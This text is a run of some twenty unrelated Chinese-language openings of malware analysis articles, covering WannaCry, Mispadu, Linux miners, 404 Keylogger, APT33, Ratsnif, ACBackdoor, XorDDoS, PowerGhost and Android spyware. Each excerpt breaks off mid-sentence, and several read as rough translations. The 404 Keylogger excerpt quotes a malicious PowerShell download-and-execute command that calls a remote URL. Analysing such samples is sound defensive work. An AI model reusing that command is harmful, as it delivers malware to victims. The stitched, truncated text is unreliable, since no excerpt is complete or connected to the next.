前言本文分析的病毒，是一种新型电脑病毒，主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大，一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密，被感染者一般无法解密，必须拿到解密的私钥才有可能破解。该病毒会扫描端口，目标机器被成功攻陷后会从攻击机下载WannaCry病毒进行感染，并作为攻击机再次扫描互联网和局域网其他机器，形成蠕虫感染。病毒运行1.电脑感染勒索病毒后，电脑桌面出现新的文本文件或网页文件，敲诈加密程序tasksche.exe、敲诈者解密程序 @WanaDecryptor@.exe

概述在本篇文章中，我们将重点介绍Mispadu，这是一个主要以拉丁美洲地区为目标的银行木马，伪装成麦当劳的广告从而将其攻击面扩展到Web浏览器。我们认为，该恶意软件家族针对的是普通用户，其主要目标是窃取金钱和用户凭据。在巴西地区，我们发现其背后的攻击者分发了一个恶意的Google Chrome扩展程序，该程序时图窃取信用卡数据和在线网银数据，并伪装成Boleto支付系统。恶意软件特征Mispadu是一个恶意软件家族，我们在针对拉丁美洲银行木马的研究过程中发现该恶意软件，该恶意软件家族主要针对巴西和墨西哥，使用Delphi语言编写，使用相

说明：  萌新一枚，最近一段时间在面试病毒相关岗位，有的公司会电话、远程面试询问相关知识，有的则会直接发送病毒样本要求分析，写出分析报告。下面要分析的就是面试过程中的某个样本，整理成文，发表出来，供大家参考学习，一起进步！如有不当之处，也希望大佬批评指正，晚辈一定虚心受教。由于考虑到时间问题，不能让面试官等太久，所以我只将病毒关键功能模块进行分析说明，没有之前文章那么详细，也请大家见谅，不懂之处欢迎提出，我也尽量解答，加油！注意：  此样本存在成人图片内容，未成年同学请勿下载

【快讯】近日，有企业用户向火绒安全团队求助，称电脑CPU、带宽无缘无故占用变高，电脑出现发热、变慢等现象。火绒工程师远程查看后，在用户电脑中发现一组暗刷木马造成上述现象。经溯源发现是来自一款名为“舟大师”的程序携带点击器木马，目前火绒已对该其进行拦截查杀。根据火绒工程师分析显示：1、该软件在未经过用户同意的情况下，进行默认安装；2、安装后默认执行开机自启，在没有任何提示的情况下，根据云控指令通过隐藏浏览器窗口暗刷特定搜索词；3、该软件没有卸载程序，普通用户无法卸载。上述行为均在用户完全不知的情况下完成

近日，深信服安全团队捕获到一款新型的Linux挖矿木马，该木马通过bash命令下载执行多个功能模块，通过SSH暴力破解、SSH免密登录利用、Hadoop Yarn未授权访问漏洞和自动化运维工具内网扩散，且该木马的文件下载均利用暗网代理，感染后会清除主机上的其他挖矿木马，以达到资源独占的目的。感染现象被感染的Linux服务器上，可以明显看到一个CPU占用率很高的进程，名字为随机字符：查看进程对应的可执行文件，是以一串疑似MD5的字符命名（并非文件真实MD5），但已经被删除：通过crontab –l命令可以看到可疑的定时任务：定时任务对应的sh脚本内

因此，您可能听说过FBI已将三种恶意软件与一个名为Lazarus的朝鲜网络犯罪组织（或HIDDEN COBRA，请选择）相关联。第一个病毒是Dropper（这是我将在本文中分析的病毒），其中包含两个DLL（其他两个病毒）：功能齐全的远程访问工具（RAT）和蠕虫，它们利用SMB漏洞进行传播WannaCry利用并试图强行强制SMB登录。尽管这些压力在2009年开始出现，这意味着我参加该党已经很晚了，但联邦调查局没有更早地弄清这一点并不是我的错。和往常一样，您可以在VirusBay上下载所有三个文件。，如果您在这里获得文件的功能和概述，请跳到最后。无论如何，让分

一、 背景随着虚拟货币市场的疯狂炒作，挖矿已经成为一种额外的经济来源，越来越多的人参与其中。从2019年安全态势来看，攻击者将企业、政府和教育行业作为挖矿的主要目标，通过弱口令爆破、社会工程和钓鱼等方式对计算机进行攻击，利用他人计算机CPU和GPU的计算能力挖取虚拟货币获利，导致计算资源被耗尽严重影响本地服务正常使用。二、 事件概述最近在单位测试环境中捕获一款新型挖矿病毒样本。经溯源分析，该挖矿病毒具有蠕虫属性，攻击者利用后门去控制失陷的计算机作为“肉机”，从3个固定的Web服务器来获取攻击的目标IP和所使用的爆

近日深信服安全团队捕获到一个最新的404 Keylogger木马变种，通过OFFICE文档嵌入恶意宏代码进行传播，盗取受害者浏览器的网站帐号和密码，深信服安全团队对此样本进行了详细分析，并获取到了黑客FTP服务器的帐号和密码，请大家提高安全意识，不要轻易打开未知的邮件附件及文档等。样本是一个RTF文档，里面嵌套了OLE对象，包含恶意宏代码，如下所示：恶意宏代码，会启动PowerShell进程，从远程服务器上下载恶意程序，然后执行，相关参数，如下：powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2P7EoT7 ” ,

众所周知，通常被称为APT33的威胁组织主要针对石油和航空业。该威胁组的报告 已有多年，但我们的最新发现表明，该组已经使用了大约十二个实时命令与控制（C＆C）服务器进行极窄的目标锁定。该小组针对针对中东，美国和亚洲的组织的针对性极强的恶意软件攻击活动，进行了多层混淆处理，以运行这些C＆C服务器。我们认为，这些僵尸网络（每个僵尸网络由一小组组成，最多可包含十二台受感染的计算机）可用于在选定目标的网络内保持持久性。该恶意软件相当基本，并且功能有限，包括下载和运行其他恶意软件。在2019年的活跃感染中，有一家提供美

我们在网上诱骗网站上发现了一个伪装成聊天应用程序的新间谍软件系列。我们认为，这些具有多种网络间谍行为的应用最初是用于有针对性的攻击活动的。我们在5月的网站http：// gooogle [。] press /上首次发现了这种威胁，该网站的广告是一个名为“ Chatrious”的聊天应用。用户可以通过单击下载按钮下载恶意Android应用程序包（APK）文件。在网站上指出。在五月份的那次遭遇之后的几个月中，该网站变得无效。我们只是注意到它是在10月推出的，这次是使用另一个名为“ Apex App”的应用程序。我们将其识别为间谍软件家族，可以窃取用户的个人

一、概述OceanLotus恶意组织（又名APT32、CobaltKitty）正在使用一系列名为“Ratsnif”的远程访问木马来实现新的网络攻击功能。Blackberry Cylance的威胁研究人员对Ratsnif木马进行了分析，发现该木马使用了一种名副其实的瑞士军刀网络攻击技术。该恶意木马自2016年以来就不断更新，目前已经结合了数据包嗅探、网关和设备ARP投毒、DNS毒化、HTTP注入和MAC欺骗等功能。我们总共深入研究了四个不同的Ratsnif样本，其中前三个在2016年开发完成，第四个在2018年下半年创建。二、恶意样本12.1 基本信息MD5：516ad28f8fa161f086be7ca122351edfSH

介绍Intezer安全研究团队近日检测到了一类新型后门——ACBackdoor，它具有Linux和Windows两种变种，能提供shell命令的任意执行、任意二进制文件执行、持久性和更新功能。目前尚无法将ACBackdoor关联到任何已知的威胁组织。在VirusTotal上，对Linux变种的检测率为0，而Windows变种的检测率要相对高些，如下图所示。图1.ACBackdoor Linux变种的VirusTotal检测率图2.ACBackdoor Windows变种的VirusTotal检测率本文将对ACBackdoor做技术分析，区分其两类变种实现上的差异。最终的调查结果表明，该恶意软件背后的团队先前具有针对Linux系统的经

家族背景以及现状介绍XorDDoS僵尸网络家族从2014年一直存活至今，因其解密方法大量使用Xor而被命名为XorDDoS，该僵尸网络家族目前活跃程度仍旧较高，主要是攻击者对其C2一直持续进行更新，下图是深信服云脑中对XorDDoS网络请求趋势分析，从访问情况来看较为稳定。下图为该僵尸网络家族在国内的感染分布图，可以看到主要存在广东以及江浙一带。防护原理分析深信服安全团队对XorDDos家族的防护原理进行详细分析，并对其做清除处理。主要进程的执行流程如下：cron.hourly下的bash文件,其中包含了其比较明显的特征名称，曾经出现过以下几种(可

PowerGhost是从2018年被发现使用powershell无文件方式进行攻击感染的挖矿以及DDOS病毒，本次深信服安全团队捕获到其最新样本，其感染方式利用了永恒之蓝，MSSQL爆破，SSH爆破，wmi以及smb爆破远程命令执行等，同时对windows和linux进行攻击，一旦该病毒进入内网，会在内网迅速传播。目前其主要感染地区在广东、浙江、上海以及江苏。详细分析该病毒母体模块分为2个版本，x86和x64，x86使用antitrojan.ps1，x64使用antivirus.ps1，本次分析x64版本的antivirus.ps1。当前病毒版本为1.5。母体payload分布以及执行图，antivirus.ps1中主要分为3

一分钟了解什么是挖矿木马什么是挖矿木马？攻击者通过各种手段将挖矿程序植入受害者的计算机中，在受害者不知情的情况下利用其计算机的云算力进行挖矿，从而获取利益，这类非法植入用户计算机的挖矿程序就是挖矿木马。挖矿木马，挖的是啥？由于比特币的成功，许多基于区块链技术的数字货币纷纷问世，如以太币、达世币等；从深信服安全团队接到的挖矿木马案例来看，门罗币是最受挖矿木马青睐的数字货币，主要有如下几个原因：1. 门罗币交易价格可观；2. 门罗币是一种匿名币，安全性更高；3. 门罗币的算法通过计算机CPU和GPU即可进行运算，不

我们最近在Google Play上发现了49种新的广告软件应用，它们伪装成游戏和时尚相机。这些应用程序是典型的广告软件，它们隐藏在移动设备中以显示广告并部署防卸载和逃避功能。这些应用程序不再可用，但是在被Google拒绝之前，下载总数已超过300万。这次最近的事件延续了移动广告软件激增的持续趋势–仅在去年八月，我们发现了85个假摄影和游戏广告软件应用程序，它们也采用了独特的技术来逃避检测。对于移动公司来说，这些广告软件应用程序一直是一个长期存在的问题。Google需要一波又一波地淘汰广告-在8月份发布一批广告软件应用之前，七月

对求生感觉最近一直很火，当然作为一个程序员来说我是不怎么喜欢玩游戏的，特别是这种烧配置的游戏。最关键还是没钱。绝对求生的各种辅助（外挂）遍地横生，也听说卖外挂月收入几万、几十万，也有很多人在问我要不要写个外挂然后卖赚点钱。对于这些我还是一口否决了（我就一个web开发的程序员不懂0day不懂游戏不懂cs开发叫我怎么写，在这堆不懂程序的人面前不能说自己不会，因为他们觉得程序员就是万能的）。正题：朋友在卖外挂（跟我没关系我没同流合污）虽然我不喜欢但是也不反感，他让我看看能不能写个外挂就给我发了一个外挂。压缩包打

在过去的几个月里，FortiGuard SE团队一直在利用和增强Fortinet机器学习系统来检测新出现的威胁。最近，其中一台机器检测到一个异常的峰值，正是根据这个结果，我们发现了一个恶意软件活动，该活动在过去一段时间曾专门针对日本用户。与大多数钓鱼活动一样，这种攻击从一封试图欺骗收件人打开附件的电子邮件开始，在本文的示例中，附件是一个恶意的Excel文档，其中包含恶意宏。然而，在这次调查中，我们发现了这些攻击者使用的反分析技术，以及一个Excel变量(目前没有文档记录)。FortiGuard机器学习系统发现的异常峰值观察到的流量主要集中

我们发现了一个间谍软件（检测为ANDROIDOS_MOBSTSPY），该间谍软件伪装成合法的Android应用程序，可以从用户那里收集信息。这些应用程序已于2018年在Google Play上下载，其中一些记录已被全世界用户下载超过100,000次。我们最初研究的应用程序之一是名为Flappy Birr Dog的游戏，如图1所示。其他应用程序包括FlashLight，HZPermis Pro Arabe，Win7imulator，Win7Launcher和Flappy Bird。自2018年2月以来，这些应用中有五分之二已从Google Play暂停。截至撰写本文时，Google已从Google Play中删除了所有这些应用。图1. Flappy Birr Dog下载页

在今年年初，Google 更新了其在Android应用程序中的权限请求，尤其是对SMS和CALL Log权限的受限访问。Google还增加了对非默认应用程序（或不提供关键核心功能的应用程序）的要求，使它们可以提示并请求用户访问设备数据的权限。此限制旨在防止伪造或恶意应用滥用这些功能来传递恶意软件，窃取可识别个人身份的信息或进行欺诈。但是，正如去年的移动威胁态势所示，欺诈者和网络犯罪分子将始终努力追随金钱，无论是调整其策略，寻找绕过限制的方法，还是在最近的案例中，我们都仿效过时的做法，和经过测试的技术。最近，我们在Google Play上